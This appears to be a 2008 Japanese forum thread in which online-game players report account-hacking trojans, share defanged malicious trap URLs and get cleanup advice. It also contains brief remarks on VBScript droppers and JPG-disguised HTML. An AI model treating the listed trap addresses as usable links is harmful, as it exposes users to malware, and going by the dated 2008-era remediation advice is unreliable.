マイクロソフト、「XP SP3」の提供を延期--未対応の問題発見で
ttp://japan.cnet.com/news/ent/story/0,2000056022,20372359,00.htm?ref=rss

だそうで。

411 ：（○口○*）さん sage ： 2008/05/01(木) 10:44 ID:M+OY4Ljq0

【　 　 　 気付いた日時　 　 　 　 　 】 4月28日
【不審なアドレスのクリックの有無　】 踏みました。Chaos GVG Histryにて。名言集？だったか
【　　アドレス 　 】ftrrdey■blog17■fc2■com
【　 　　 OS　 　 】WindowsXP Home SP2
【使用ブラウザ 】IE7.0
【WindowsUpdateの有無】確か2週間くらい前。自動更新にしてるので最新のはず…
【　アンチウイルスソフト 】Avira AntiVir
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】アドレスを踏んだ瞬間に検出。パニックになっていたのでTrojanで始まる以外忘れてしまったorz
【テンプレの参考サイトを読んだか】Yes
【hosts変更】なし
【PeerGuardian2導入】なし
【説明】
風邪でぼんやりした頭で放置Wikiを覗いたらものの見事に改ざんURLを踏んでしまいました。
即座にAvira AntiVirが反応したのですが、
実はこのソフトは海外に住んでいた時にPC修理店で入れてもらったもので、
日本語での使い方を読んでいませんでした。
パニックになっており、使い方を確認することも頭に浮かばず、
慌てて「Delete」をクリック。
即座に別PCで全てのパスを変更し、
同時にカスペルキーオンラインスキャンをかけました。
カスペルでは検出されなかったのですが、Avira AntiVirが日本語でない不安から、
カスペルトライアル版にセキュリティソフトをシフト。再びスキャンをかけるも、検出はされず。
また、Spybotも導入し、検出されたスパイウェアを全て削除。
セーフモードでもサーチしましたが検出されず。
最後にPeerGurdian2も導入し、リネ資料室にあるリストを全て登録しました。

100%の為にはクリーンインストールしかないのは勿論承知していますが、
今この状態で安全度はどのくらいになるのでしょうか？
アドバイス頂ければ嬉しいです。よろしくお願いいたします。

412 ：（○口○*）さん sage ： 2008/05/01(木) 11:26 ID:v2YoNgpJ0

安全度って。。。

／^o^＼

413 ：（○口○*）さん sage ： 2008/05/01(木) 11:48 ID:aOtI+iHM0

そもそもパーセンテージを求めるのが間違い。
全か無か、しかありえないわけだから、総じて100%か0%にしかならん
んでこの歴代スレ見てもらえば判る通り「踏んだ可能性があるなら絶対安全とは言えない」のだから
とるべき手段は……もうわかるな？

ちなみにPeerGuardian2は感染後の治療処理システムじゃない
予防に作用するためのシステムだ（感染後にまったく意味が無いわけではないけど）。

414 ：（○口○*）さん sage ： 2008/05/01(木) 18:03 ID:LRFfzP+C0

まぁ、今回はAntiVirがきちんと防いでる訳だが。敢えて外しちまうのはなんでかなー。
個人的には、AntiVirを選択した修理店GJだ。

だが、修理に出して、アンチウィルスソフト入れてよこすってことは・・・・・・・・・・・・・・・・・・・・
・・・・・・・・・OS入れなおし＋セキュリティソフト導入からやっとけよって判断されたってことだろ。
ここで診断頼んでも、その修理店と診断結果は同じだぜ。

やってる対処はOKだが、それ以前の自己責任の範疇のところがどうなってるかは知らんわ。

415 ：（○口○*）さん sage ： 2008/05/01(木) 18:51 ID:hi251b5B0

パソコンを家電感覚で扱う事が、まだまだリスクの高いことの証明みたいな事例だな。
それと、PC絡みで出てくる英語なんて、決まり切った単語程度しか使われていないから、落ち着いてGoogle先生に投げ込めば
大体のニュアンスは掴める。
このあたりは、ウイルス以外にも広範的に通用する要素なので。

416 ：411 sage ： 2008/05/01(木) 18:55 ID:M+OY4Ljq0

アドバイスありがとうございました。
色々と書き方が悪く、ご不快な思いをさせてしまい、申し訳ありませんでした。
パーセンテージを求めていたわけではなかったのですが、
シロかクロ、という2択以外の結果を求めていたのかもしれません…。
皆さんのお言葉を聞いて、目が覚めました。
以後、心を入れ替えて行こうと思います。

>>414
仰る通り、修理前は安全対策意識が欠けており、
セキュリティにあまり頭を回していませんでした。
（修理に出したのはHDDの故障で、修理というかHDDを交換しました。
セキュリティソフトはご好意で入れて頂いていたようです）
AntiVirを外したのは、ソフトが全てドイツ語だったため、
いざという時に言葉の意味を間違えてしまったらまずい…と思ったためです。
（ドイツ語は出来ますがそれこそ100%ではないので）

今回のことで自分のセキュリティ認識の甘さを痛感しました。
今後、自戒を心がけます。

417 ：411 sage ： 2008/05/01(木) 19:07 ID:M+OY4Ljq0

>>415
そうですね…ここに相談するまで、まさに家電感覚でした。
我が身に降りかかってようやく恐ろしさに気付くとは…。
ウィルス検出からここに相談するまで、完全にパニック状態で、
落ち着いた対処が全く取れていませんでした。
今になってようやく頭が冷えた感じがします。不安なら最初からPCまっさらにするべきですよねorz
ちなみにAntiVirを外したのは、前述の通り言語が全てドイツ語だったため、
今後の使用で意味の取り違えなどを起こしてはまずいな、と思ったためでした。
この辺りも私の勉強不足によるものですね…。

418 ：（○口○*）さん sage ： 2008/05/01(木) 21:24 ID:LtcQXYn50

>>411
AntiVirは英語版も有るがカスペを購入する気ならその判断で良かろう。
有料の場合のサポートがどれだけあるか、と言われるとそう大差ないと答えるしか
ないが、その差はPCに不案内な人にとっては大きな意味があるから。

419 ：（○口○*）さん sage ： 2008/05/02(金) 13:52 ID:qkwogxDs0

ttp://www.itmedia.co.jp/news/articles/0805/02/news019.html
オンラインゲームの通貨で資金洗浄？　携帯電話で実行するマルウェア出現

色々やるなあいつらは・・・

420 ：（○口○*）さん sage ： 2008/05/02(金) 19:34 ID:rZJMo+4o0

今日、公認ネカフェへ行ってきました。
カスペのオンラインをポチっとな・・・。
感染1　trojan-Downloader.Win32.Small.dqf となっていました。
どうも調べてみるとＣＡＶＡＬ　ONLINEというゲームのｎＰｒｏを誤検知しているんじゃないか？
と思ったのですが、チキンなもので今日は諦めて帰ってきました。

明日もう一度行ってＣＡＶＡＬをアンインスコしてスキャンかけてみます。
オレの6時間・・・。

421 ：（○口○*）さん sage ： 2008/05/02(金) 21:02 ID:qkwogxDs0

画像ファイルなどについて質問です。
「JPGなどはヘッダを見る」というような事を前に見たのですが、
画像ファイルをメモ帳などで開いた時の　JFIF　などで判断すると言う事であっていますでしょうか？

422 ：（○口○*）さん sage ： 2008/05/02(金) 21:46 ID:y5o3XgcC0

>>421
＞JPGなどはヘッダを見る
URLが.jpgで終わっていて、サーバがimage/jpeg（これは画像だ）と
言っているにもかかわらず、IEは中身がHTMLならHTMLとして表示する。
本来は画像しかおけないはずのアップローダに、IEにとっては
危険なjpg偽装HTMLを仕込むことができる。

文脈にもよるから断言できないけど、たぶんこの話だと思う。

423 ：（○口○*）さん sage ： 2008/05/03(土) 00:21 ID:76FYovKp0

ID変わってしまいましたがありがとうございますー

424 ：（○口○*）さん sage ： 2008/05/03(土) 02:44 ID:yjTSHswH0

場違いな質問かもしれませんが･･･(´・ω・｀)

IFRAME問題でFC2から忍者ブログに乗り換えたものですが、
忍者側に問い合わせたところこちらでもIFRAMEﾀｸﾞは使用可能ということでした。
現在被害の殆どはFC2に集中しているという事ですが、
忍者ブログで被害にあったケースもやはりあるのでしょうか？

そして>>386氏の

・iframeタグが有害であるため、即日運営側にて削除したこと

は、あくまでもタグを削除しただけであって、IFRAMEそのものはまだ使えるという事ですよね？

ちなみにiframe 要素を表示しない設定でブラウザやメールソフトを使用する事ができれば
ウィルスには感染しないのでしょうか？

ﾁｷﾝな漏れに御教授お願いします(´・ω・｀)

425 ：（○口○*）さん ： 2008/05/03(土) 05:23 ID:h93t2wCY0

tp://www■netgamerjp■com/wiki/ ,

これって垢ハク？すっごいクリックした

426 ：（○口○*）さん sage ： 2008/05/03(土) 06:17 ID:XtnwYLML0

※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

427 ：（○口○*）さん sage ： 2008/05/03(土) 07:05 ID:t0twUnWa0

>425
それって、すっごいアカハックアドレス。
テンプレ読んで処置するがよろし。


ちなみに冗談でも何でもなく、それ本当に危険アドレスだから。
疑うならまとめサイト(臨時)とかのhostsを見てくればいいよ。

428 ：（○口○*）さん ： 2008/05/03(土) 07:14 ID:h93t2wCY0

ありがとうございました

429 ：（○口○*）さん sage ： 2008/05/03(土) 07:20 ID:6aON5dqb0

※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※


最低限症状ぐらいかけ。

430 ：（○口○*）さん sage ： 2008/05/03(土) 07:36 ID:pJPYpSyO0

typoを狙ってるから、危険アドレスとして知らなくても
怪しい怪しくないでいえば怪しいなｗ

431 ：（○口○*）さん ： 2008/05/03(土) 07:41 ID:h93t2wCY0

症状？白い画面でて〜ってもうテンプレ通り
カスペルスキーでスキャン中です
その間にゲームにログインはしていませんが
ガンホーID　パスにはログインしてしまいました。
セフセフ？

432 ：（○口○*）さん sage ： 2008/05/03(土) 08:17 ID:wdCe76DG0

何処のスレもお子様で満ちあふれてるな

433 ：（○口○*）さん sage ： 2008/05/03(土) 08:19 ID:Zr6lg3+c0

>>431
ログインしなければパスは絶対に抜かれない
つまり
そのままゲームをやめればハックされることもないぜ！

冗談はさておき、不安ならクリーンインストール汁。

434 ：（○口○*）さん ： 2008/05/03(土) 08:24 ID:h93t2wCY0

>>432
＞ｗ＜

>>433
やったー！絶対抜かれないんだ！中華ざまぁ！フリーチベット！
ありがとう
ついでにクリーンインストールｋｗｓｋぐぐってきます

435 ：（○口○*）さん sage ： 2008/05/03(土) 08:31 ID:t0twUnWa0

>431
せめて相談用テンプレ(>4)に沿って書いてくれ……
でないと回答しようがない。

そして netgamerjp をソースチェッカーで覗いてみたら
いきなりVBScriptなコードのお出迎えで吹いた。
jpmmなEXEが仕込んである上、I LOVE CUTEQQ TEAM だとさ。


>433-434
既に癌公式にはログイン済みっぽいから、ゲームを辞めても
ハクられると思うぞｗ

いや、笑い事じゃないけどさ。

436 ：（○口○*）さん ： 2008/05/03(土) 08:32 ID:h93t2wCY0

なんやて！
別PCでパス変えてくる！！でおｋ？

437 ：（○口○*）さん sage ： 2008/05/03(土) 08:38 ID:Llgd4DpP0

今すぐやってこい

438 ：（○口○*）さん ： 2008/05/03(土) 08:41 ID:h93t2wCY0

ういっす！

439 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/03(土) 08:48 ID:3194+uQN0

>>431
ふと気になったのはROにログインしていなくても
ガンホーのアトラクションセンターにログインしてしまったと
書いてあるように読み取れるのですが。

怖がらせる事例になってしまうのですが、
ガンホーIDとそのパスワードが抜かれるウイルスの場合は
それらを使って、アカウントのパスワードを変えてから
アイテムを盗んだ後にガンホーIDを削除されてしまったと言う、
被害報告があがっていました。

多分、現在クリーンインストール中と思われますが
念のために終了後>>6の手順を踏んだ後で
ガンホーIDのパスワードを変えた方がよろしいかと。

440 ：（○口○*）さん ： 2008/05/03(土) 09:04 ID:h93t2wCY0

カスペ様は駆除できないってでてきました

いろいろ怖いのでリカバリしてきます。

さようならわたしの4時間

441 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/03(土) 09:10 ID:3194+uQN0

と…>>435さん手早いフォローGJ。

最近RO側ではブログ等で
アカウントハックの書き込みを見ることが少なくなりました。
ただ今のように被害が挙がってきてはいますが。

むしろmixiでRO関連の日記を書くと、
業者がホイホイ書きこんでくるようです。
mixiにログインしていない時に気が付かないうちに書き込まれている物は
報告があれば運営側で削除している模様。

対応策としては
・とりあえずリンクがあってもクリックしない。
・クリックするならaguse.jp(http://www.aguse.jp/ )等でチェック。
・危険サイトリストに入ってないかリネージュ資料室さんで調べる。
・アカウントハックURLだと判ったらmixiの運営に報告する。
・設定で日記の公開設定を"全体に公開"以外にする。
　(全体公開でもROの日記だけ個別に変えてやることも出来ます。)

ぐらいでしょうかね…。

442 ：（○口○*）さん sage ： 2008/05/03(土) 09:23 ID:h93t2wCY0

リカバリすれば100%安全なん？

443 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/03(土) 09:33 ID:3194+uQN0

リカバリーディスクが添付してあるようなメーカーPCの場合、
それを使ってリカバリーすればOSは購入当時の状態に戻ります。
手動でクリーンインストールした場合もほぼ同義。
どちらも実行前に重要な個人データ(txtとかjpgとか)はどこかにバックアップ。

リカバリー後はセキュリティ的に手付かずの状態なので
WindowsUpdateは必須です。
それにネットにつなぐ前にアンチウイルスソフトがあれば、
繋ぐより先にインストールしておく事で安全性は増します。

444 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/03(土) 09:42 ID:3194+uQN0

とりあえずテンプレ >>1-7
大体のことはテンプレに書いてある事で対応できます。

442さんが425の人なら早くデータをバックアップして、
リカバリーないしクリーンインストールの作業を。
別PCでここを覗いているのであれば、
テンプレ>>4に沿ってどこで踏んだか報告があるとよい仕事。

445 ：（○口○*）さん sage ： 2008/05/03(土) 09:52 ID:Y//YfsV50

今までに報告事例のある垢ハックウイルスの一覧表みたいなの無い?

446 ：（○口○*）さん sage ： 2008/05/03(土) 09:56 ID:1mbSLJWR0

それはまとめ臨時氏を前にして言うことかｗ

447 ：（○口○*）さん ： 2008/05/03(土) 10:22 ID:8pBMHfq0O

まとめ臨時君ありがと〜
被害あるまえに色々対策できた気がします
別PCでパスも変えたし…

448 ：（○口○*）さん sage ： 2008/05/03(土) 11:23 ID:Y//YfsV50

>>446
臨時まとめサイトサクっと見た感じでは、一覧みたいなのなかったからな

449 ：（○口○*）さん sage ： 2008/05/03(土) 11:32 ID:wdCe76DG0

ウイルスの名称なんて対策メーカーによってまちまちなんだが？

450 ：（○口○*）さん sage ： 2008/05/03(土) 11:36 ID:Y//YfsV50

それは知ってるがウイルス名分かればココじゃなくても、各メーカーページ見にいけば対処載ってるだろうよ

451 ：（○口○*）さん sage ： 2008/05/03(土) 12:41 ID:rc2pEJrc0

個々のウイルス毎の対処なんて知ってどうするんだ…

452 ：（○口○*）さん sage ： 2008/05/03(土) 19:26 ID:mexz2hYE0

質問。
ファイアフォックスをダウンロードするウィルスってあるのかな？
普段ネットにつなげっぱなしで電源いれっぱなしのマイPCなんだけど
昨日、仕事から家に帰って来たらなぜかファイアフォックスがダウンロード
されていたんだ。
いつもIEのウィンドウをはいくつか開きっぱなしにしてたが、それは閉じられていた。
これは、ウィルスの仕業なのだろうか…？

他に考えられる可能性としては
ときどき遊びに来る妹なんだが。

だとしたら
エロ小説サイトを開きっぱなしにしておいたのがきまづい。

453 ：（○口○*）さん sage ： 2008/05/03(土) 19:32 ID:je/oDuuv0

ねーよ。AdobeReaderだかRealPlayerだかDivXだかに
Firefoxが丸ごと入ってた気がする。

454 ：（○口○*）さん sage ： 2008/05/03(土) 21:08 ID:LcFJL6DS0

>>452
妹ウイルスﾜﾗﾀ。多分、下記が検出されてると思う。

IMOUTO.Downloader.fox
IMOUTO.Closer.ero
IMOUTO.Checker.histoty
IMOUTO.Deleter.erog

455 ：（○口○*）さん sage ： 2008/05/03(土) 22:12 ID:DcLdb5Ie0

そのウイルスは防御不能だな

456 ：（○口○*）さん sage ： 2008/05/04(日) 01:25 ID:k5F0j7sy0

>>452
最近使ったファイルやIEの履歴なんかチェックすればもっと楽しいかもしれん

457 ：（○口○*）さん sage ： 2008/05/04(日) 07:01 ID:VL5m21sT0

>>453
そういうウィルスじゃないのか
それじゃやっぱり…

あー、勝手に人のパソコンいじるなって言おう。

458 ：（○口○*）さん sage ： 2008/05/04(日) 08:36 ID:2Cc+wuQh0

>>457
セキュリティ的に見て妹が正しい

459 ：（○口○*）さん sage ： 2008/05/04(日) 09:04 ID:bmJpUq2p0

>>457
妹ウイルスに有効なのは卑猥な壁紙でセキュリティ

460 ：（○口○*）さん sage ： 2008/05/04(日) 09:05 ID:ujlbz/5f0

Trojan.Hachilem!gen
はアカハックウィルスではありませんよね？
すぐ消去したのですが…無知な質問ですみません。

461 ：（○口○*）さん sage ： 2008/05/04(日) 09:27 ID:ruqdu2fH0

>>460
無知なあなたはまずググるということを憶えるべきだ。

ざっと検索結果見たけどなんかやばそうなシロモノだねぇそれ。

462 ：（○口○*）さん sage ： 2008/05/04(日) 09:30 ID:XgQpi3ML0

アカハックじゃないかも知れんがHachと付いてるからハックウィルスだろうな

463 ：（○口○*）さん sage ： 2008/05/04(日) 11:52 ID:2Cc+wuQh0

Trojan.Hachilem
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2005-070812-1520-99

＞Trojan.Hachilem はメールアドレスを盗み取り、ユーザに無断でポルノサービスに登録するトロイの木馬です。

エロサイト廻りも程々になｗ

464 ：（○口○*）さん sage ： 2008/05/04(日) 13:35 ID:ujlbz/5f0

レスありがとうございます。
グーグル＆シマンテック等のウィルス検索で調べてはみたのですが心配になって質問させていただきました。

>>463
私はFirefoxを使っているので弟がIEで見てたのかもしれませんｗ
でも自分の責任も否定できない／(＾o＾)＼

465 ：（○口○*）さん sage ： 2008/05/05(月) 01:49 ID:VcG0Vpyc0

教えてくださいな。
mixiの日記のコメントに
www■netgamerjp■com/wiki/
が書いてあったんですけど、これはＲＯやってない人には無害なんでしょうか？

466 ：（○口○*）さん sage ： 2008/05/05(月) 01:57 ID:KLPWhFhP0

>ＲＯやってない人には無害
とりあえず、そういう思考を直すところから始めようか

467 ：（○口○*）さん sage ： 2008/05/05(月) 02:01 ID:VcG0Vpyc0

>>466
という事はmixiのパス抜かれるとかどこかにばら撒いちゃう可能性があるって事ですか？
とりあえずmixiの事務局には通報しときましたけど。

468 ：（○口○*）さん sage ： 2008/05/05(月) 02:16 ID:W64B0/kx0

>465
踏んだら感染するタイプなんだから、どんなタイプだって仕込める。

今はRO限定かもしれんが、10分後にはリネ限定の罠に更新されてるかもしれない。
もしかしたらネットバンクを狙うタイプやmixiを狙うタイプが仕込まれてるかもしれない。
その辺りはハク犯（この場合は中華）の考え１つで変わる。

過去に罠報告があって、１時間しないうちに別タイプに更新されてたケースもあるし
ROの罠だから・ROの罠じゃないから、とかいう考えは危険。

469 ：（○口○*）さん sage ： 2008/05/05(月) 08:37 ID:NAURJHHe0

>>465は>>425-を読むべき

470 ：（○口○*）さん sage ： 2008/05/05(月) 08:46 ID:5RY7XfWS0

黄金厨

471 ：465 sage ： 2008/05/05(月) 10:12 ID:VcG0Vpyc0

>>468
ああ、なるほど。
踏んだ瞬間はmixi限定の罠が張ってあったかもしれないし、jpmmにmixiパス収集のコードが加えられてる事も考えられるのですね。
firefoxだったしカスペル様のオンラインスキャンでも検知されなかったんで、ＲＯやってない人間には無害ならばステルス化している可能性に目をつぶってこのまま使いつづけようかと思ったんですが･･･
どうやら『Free Tibet　　China Free』を叫びながらクリーンインストールした方がよさそうですね。ヽ(`Д´)ﾉ ｳﾜｧｧｧｧｧｧﾝ!!!

>>469
netgamerjpをググッたら>>425に引っかかってこのスレに辿り着きました。

>>470
＞ｗ＜

皆さんどうもありがとうございます。(T_T)

472 ：（○口○*）さん sage ： 2008/05/05(月) 21:58 ID:usayl1tg0

総合スレ＞647-648
646は「具体的手法」について扱ってるので問題無い。
おまいらの書き込みの方がS/N比を悪くする原因だ。自重しろ。

473 ：（○口○*）さん sage ： 2008/05/05(月) 22:26 ID:WuJ3EDVj0

むしろ誘導キチガイが重要な情報を埋めてる件
「重要な情報が〜」「Nice bot.」あたりを透明あぼ〜ん設定すれば見やすくなるが

474 ：（○口○*）さん sage ： 2008/05/05(月) 22:48 ID:usayl1tg0

＞総合スレ649-650
突っ込みはこっちでやれよ。愚痴スレに対する突っ込めスレみたいにさ。

475 ：（○口○*）さん sage ： 2008/05/06(火) 00:15 ID:BeWWg10q0

と言うか向こうはロクに機能してないし馬鹿も規制されないからもうこっちでまとめちゃった方がいい気がする

476 ：（○口○*）さん sage ： 2008/05/06(火) 02:51 ID:WRqJzByQ0

>>473
S/Nと書かれてシリアルナンバーしか思いつかないんだが

477 ：（○口○*）さん sage ： 2008/05/06(火) 03:37 ID:udt9AE3n0

が、何？

478 ：（○口○*）さん sage ： 2008/05/06(火) 03:52 ID:WIE1zSYR0

S/Nは信号対雑音比
信号(Signal)と雑音(Noise)との量との比率(S/N)によって品質を表現する。

信号＝重要な情報、雑音＝必要ない情報

>>475
スレ自体で纏めるのは無理だと思う
特定の人のみが更新可能なパスワード制限付きのWikiかCGIを使って
纏めていくしか道はないのかな
ミイラ取りがミイラにならないように信頼できる人を募集するとか
難易度は高いですがね

479 ：（○口○*）さん sage ： 2008/05/06(火) 04:16 ID:b5C2GseT0

向こうは廃棄して、こっちで全て取り扱う、って事だろ。


それと情報の取り纏めは、今は臨時の人がやってくれてる。
臨時の人のサポートするにせよ、信頼出来る人を募集ってのは
正直難しいと思うな。

それにスレテンプレの改訂すら進展無い状態がずっと続いてるし。
スレを統合(というか向こうを廃棄か？)ぐらいなら決めれると思うけど
今の状態を考えると、それ以上は動けないと思う。

480 ：（○口○*）さん sage ： 2008/05/06(火) 04:25 ID:hJTTc1fe0

サイトは
ttp://rosafe.rowiki.jp/
を再利用させて貰えばいいんでない。
今は半ば放置状態で誰でも編集できるけど、弓の中の人に言えば
>>478 特定の人のみが更新可能なパスワード制限付きのWikiかCGIを使って
のようにでもどうとでもしてくれるだろう。

481 ：（○口○*）さん sage ： 2008/05/06(火) 10:22 ID:kioCl2mG0

向こうのスレは、>>210でも書いたけど、最初のスレが建てられた時からは情勢が変化し過ぎて、時代にそぐわなくなってきている。
Domain Tasting/KitingなどAGPルールが濫用されるようにもなりつつあり、もはやFQDNだけでは悪意あるサイトをブロックし切れない
時期が来ているような気もする。CIDR表記によるIP-range指定で止めた方が無用なトラブルが起きないかもしれない。

それとは別に、編集権限を絞りこむには、不埒な輩の潜入を防ぐ手だても必要かも。
現在組まれている、ROサイト管理者連絡会の下位部会として、セキュリティ部会あたりを立ち上げるのが無難な落とし所かも。

482 ：（○口○*）さん sage ： 2008/05/06(火) 12:16 ID:CkqeqfFC0

総合スレではノイズ扱いの一般的話題でも、こっちでは、シグナル扱いだったりするしなー

総合スレでの過剰な誘導はやめて、こっちで突っ込むことだけ努力してればいいよ。
それができない奴は空気扱いで。

483 ：（○口○*）さん sage ： 2008/05/06(火) 13:26 ID:J6Mhlfn40

総合スレはデコイだな

484 ：（○口○*）さん sage ： 2008/05/06(火) 17:07 ID:OsR2BirZ0

【　 　 　 気付いた日時　 　 　 　 　 】 本日16時
【不審なアドレスのクリックの有無　】有
【　　アドレス 　 】http://ja■wikipedia■org/wiki/%E5%8D%B8%E5%A3%B2
【　 　　 OS　 　 】WindowsXP Professional SP2 (SP等まで正確に書く)
【使用ブラウザ 】Sleipnir
【WindowsUpdateの有無】先週の金曜くらいに
【　アンチウイルスソフト 】 Symantec AntiVirus
【その他のSecurty対策 】 Spybot S&D、PG2
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンでTrojan-Downloader.Win32.Banload.lxfを発見
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】有･リネージュ資料室等を参考
【説明】
WIKIを見る際に、PG2を一時的に切る→終わった後に復帰させるを行ったところ、
急激にPG2が反応したので不審に思い、完全スキャンをかけたところ、外付けのHDDから上記のウィルスが
検出されました。
ウィルスの名前をググったところ、同じ拡張子のウィルスの情報が出てきませんでした。
SymantecとSpybotで現在検出を行っていますが、このトロイは危険なものなのでしょうか。

485 ：（○口○*）さん sage ： 2008/05/06(火) 17:28 ID:CkqeqfFC0

＞このトロイは危険なものなのでしょうか。

危険の程度は千差万別かもしれないが、危険性の無いものであれば、トロイやウイルスとして認定されたりはしない。

486 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/06(火) 18:31 ID:NeFFrfrx0

>>445
ウイルス名を一覧でまとめると言う点については
各メーカーでそれぞれ名称が
>>449 さんの言われるように違ったりする事や
アップデートされるたびに
各メーカーをチェックしなければいけないという事があります。
何より手間隙な労力を想像すると
時間的にやってられないと言う状況に陥りそうな作業です。

また、ウイルス自体はどこかしらのサイトに置かれている事、
どんなタイミングか判らないけど差し替えが行われている事などから
ドメイン・サイト名を抑えさえすれば、
いくつかの例外を除けば一応防ぐことが出来ます。

こういったことから結果的にドメイン・サイト名は纏められているものの、
そのサイトに置かれていたウイルス名の一覧が纏められていないのだと思います。

487 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/06(火) 18:36 ID:NeFFrfrx0

しかしながらウイルス名一覧自体は
データ資料としては有効ではあると思います。
(例えば >>484 であげられている外付けHDDから発見されたので
どういった物か知りたい時や
>>445さんのように例えばで見つけたときの対処方法が知りたい場合)

ただ、ウイルス名を知って調べるような状況と言うのは
踏んでしまった後にアンチウイルスソフトが検知した時が一番多いかも？

この場合罠URL自体の先が既知ウイルスだけであればいいのですが、
差し替えられていたりすると出来る対応は
自己責任による監視か
お約束のリカバリやクリーンインストールになってしまうので…。

488 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/06(火) 18:42 ID:NeFFrfrx0

身も蓋も無いことですが、ぶっちゃけた話、
本家まとめさんでやられていたと思われるやり方を
そのまま真似しているだけなんだ…。

総合対策、セキュスレの先輩ら、本家まとめさん、
BS-Templateさん、リネージュ資料室さんに教わって出来たのが
今の自分の知識。

有志の検体提出や発見した罠サイトの報告等のみなさんの善意の作業と、
被害のテンプレ報告等を見て対応する事で
アカウント対策が成り立って居たりします。

489 ：（○口○*）さん sage ： 2008/05/06(火) 18:56 ID:kioCl2mG0

>>484
Trojan-Downloaderの名前通り、何かをダウンロードさせる踏み台トロイなので、一概に危険度を示すことは出来ない。
ただ、ダウンロード先から何を運んでくるかが未知数なので、駆除できるにこしたことはない。

それと、Wikipedia(混同を避けるためにWikiとは表記せず)閲覧の間だけPG2を無効化するような使い方は、結果的にセキュリティリスクを
高めていると言えよう。
終了後の復帰を忘れたまま、他のサイトを閲覧したり、閲覧中に外部からの攻撃に曝されるといったヒューマンエラーの危険性がある。
Wikipedia自体を、PG2のブロック対象から外す方が望ましい。
それと、外付けHDDということから、感染源がそのPCと断定する事も不能。
呈示されたアドレス自体は、特に問題となる要素は見つからなかったが。

490 ：（○口○*）さん sage ： 2008/05/06(火) 19:17 ID:OsR2BirZ0

>>485 >>489
なるほど･･･一概にトロイだから絶対に垢ハックであるってわけではないってことですかね。

何処で何をやったからなのかはわかりませんが、リカバリー直後のPCと今使っているPC以外で
外付けを使ってはいないので、多分こちらのPCが原因で外付けについたのではないかと思ってます。

色々と考えるのが面倒になったので、外付けをフォーマットしました。
結果として外付けからはトロイ自体は消滅したっぽいのでこれで様子を見てみます。
ありがとうございました。

491 ：（○口○*）さん sage ： 2008/05/06(火) 19:52 ID:4EgW/ikY0

ネカフェスレで帰宅までの間にID消されてたとかいう話あった
装備撒くよりタチ悪いね

492 ：（○口○*）さん sage ： 2008/05/06(火) 20:52 ID:qdtApLYx0

スレ違いかもしれないんですが
警察に捜査以来出して5ヶ月たちました
進展があったら電話するといわれたのですが5ヶ月一度も来ません
本当に無いなか問い合わせるのは気が引けてしまいます
もし問い合わせた方いらっしゃったり、アドバイスなどあればどうかお願いできないでしょうか

493 ：（○口○*）さん sage ： 2008/05/06(火) 21:09 ID:1dJ7aqwk0

>492
心置きなく聞いていい
彼らは税金で働いていると考えるんだ

494 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/05/06(火) 21:10 ID:kWJSvfrq0

今までの救済事例を見ると、
早い方では二ヶ月ぐらいで大体半年ほど掛かっているみたいです。
全く連絡が無いので電話をしたら、
実は調査が終わっていたと言う事もあるそうなので
余計な気を回さずに、その後どうなっているか聴いてみても大丈夫かと。

それに一週間置きとは言わなくても
一月置きぐらい連絡を取る分には問題は無いと思います。

495 ：（○口○*）さん sage ： 2008/05/07(水) 00:24 ID:QoOeN4YZ0

>>493
>>494
ありがとう(´；ω；`)
ちょうどGWあけたし明日電話してみる！

496 ：（○口○*）さん sage ： 2008/05/07(水) 01:19 ID:jQn4GTun0

知らぬ間にＣドライブに CountCyclesWMVDecLog というtxtファイルが
2008/3/25 19:40に作成されているのに気付いて
ググると原田ウィルスに関係があると出るが、今まで実害も無く
カスペ等のフルスキャンでも何もでない。3/25に関係ありそうな動画ファイルは見つからなかった
OSはwin2k、avast、spybotS&D、PG2が入ってる。
グーグル以上の情報は手に入らなかったが
念の為、これが何かウィルスに関係あるようなら教えて貰えないだろうか

497 ：（○口○*）さん sage ： 2008/05/07(水) 08:24 ID:m4Q5Uokj0

WindowsXP SP3 リリース
保存版
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=5b33b5a8-5e76-401f-be08-1e1555d4f3d4&DisplayLang=ja
CDイメージ
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=2fcde6ce-b5fb-4488-8c50-fe22559d164e&DisplayLang=ja

498 ：（○口○*）さん sage ： 2008/05/07(水) 10:56 ID:Hf6ENDAT0

SP3は通常のWUと違ってシステム的には割と大きな変更になるので
導入前にバックアップをお忘れなく。
可能ならシステム丸ごとバックアップ、ぐらいはした方がいい。

またIE7やIE8Bataを入れてた場合、SP3当てた後ではIEのアンインストールが
出来なくなるようなので、一旦IEをアンインストールしてIE6の状態にしてから
SP3を当てて、完了後に再度IE7を入れなおした方が無難っぽい。

499 ：（○口○*）さん sage ： 2008/05/07(水) 12:16 ID:Hf6ENDAT0

>496
同じようにググっただけなので何とも言えないが、原田ウィルスが
使うファイルらしいとしか判らなかった。

原田ウィルスは亜種が多いから、カスペでもまだ対応してない代物に
引っかかった可能性も０とは言えない。
カスペのスキャンを信じるか、OS再インストールするか、のどちらかに
なるんじゃないかな。

500 ：（○口○*）さん sage ： 2008/05/07(水) 16:27 ID:m4Q5Uokj0

>>498 補足。
今後IE7からIE6に戻る気がないならサクッと入れてよし。
ただしIE8Beta1の人はIE7に戻してから入れるべし。
IE8Beta1→IE8Beta2-(略)→IE8正式版
という入れ方はできず毎回アンインストールする必要があるが
そのアンインストールができなくなるため。

501 ：（○口○*）さん sage ： 2008/05/07(水) 17:15 ID:HcM81SoD0

ROに使ってなかったPCを一ヶ月ぶりに起動してWindowsアップデートしてから
ROのパッチあてたところRagnarok.exeファイルが消えて起動できなくなりました。
（リスタートを押したらそのままリスタートが何度も表示されて
どうにもならないので再起動かけたらragnarok.xexを探してますとでて
